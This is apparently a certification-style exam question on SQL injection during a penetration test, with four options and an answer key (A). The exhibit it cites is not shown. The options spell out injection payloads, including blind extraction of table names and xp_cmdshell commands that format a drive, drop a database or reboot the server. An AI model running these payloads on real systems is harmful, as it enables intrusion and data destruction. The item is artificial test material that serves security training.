Exhibit:
You are conducting a pen-test against a company’s website using SQL injection techniques.
You enter “anuthing or 1=1-“ in the username field of an authentication form. This is the output returned from the server.
What is the next step you should do?
A . Identify the user context of the web application by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = ‘dbo’
B . Identify the database and table name by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1))) > 109
C . Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; -
D . Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell ‘iisreset Creboot’; -
Answer: A